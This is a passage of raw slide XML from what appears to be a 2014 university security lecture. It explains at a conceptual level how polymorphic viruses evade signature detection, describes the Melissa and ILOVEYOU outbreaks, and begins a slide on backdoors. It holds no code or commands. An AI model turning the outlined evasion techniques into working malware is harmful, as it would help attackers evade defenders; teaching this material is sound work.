            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious code is effectively detected with signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Polymorphic viruses mutate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>themselves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> during replication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>so as to remain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>undetectable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt most of the virus with a different random key each time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virus decrypts main body using random key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jumps to the code it decrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When replicating, generate a new key and encrypt the main part of the replica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To avoid signature-based detection the remaining code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>must be modified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>keeping the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insert no-op instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> subtract 0, move value to itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reordering independent instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using equivalent instruction sequences</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3816422321"/>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Strategies for Polymorphic Viruses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encrypt most of the virus with a different random key each time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virus decrypts main body using random key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jumps to the code it decrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When replicating, generate a new key and encrypt the main part of the replica</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32051677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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Melissa Macro Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instantaneous planetary virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, discovered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>26 Mar, 1999</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Although not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>originally designed for harm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Melissa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shut down Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>systems that got clogged with infected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>emails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>propagating from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>document received by email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visual Basic Script code associated with the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” method of Word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>message to the first 50 addresses in the address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>book</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The author David L. Smith was arrested within a week and sentenced to 20 months and fined $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182276" name="Picture 4" descr="david_smith"/>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943600" y="228600"/>
            <a:ext cx="1828800" cy="137531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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{39D18CF7-64E8-1F41-A41E-28D58F3FD788}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3396662119"/>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Love Letter Worm, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>«ILOVEYOU»</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Arrived as email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visual Basic Script attachment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploited Window’s extension hiding to display a fake “txt” extension for the original file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iloveyou.txt.vbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Propagates by email to all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>addresses in the address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>book</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also propagates through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IRC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>home page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replaces several different kinds of files with copies of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ILOVEYOU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>caused $10 billion in damages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Landler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18435494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ILOVEYOU Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>American parliament science committee:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“In one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>day’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>time, roughly 47 million people received the e-mail worldwide and the virus looked for love in all the wrong places in over 10 million computers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insurance giant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lloyd’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of London has estimated the virus will cost over $15 billion in damages and lost productivity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1377816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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Backdoors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program that allows remote access to a system, without the user knowing about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installed by Trojan horses and hence often classified as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>such</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Characteristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size: small is beautiful and easier to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>install</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
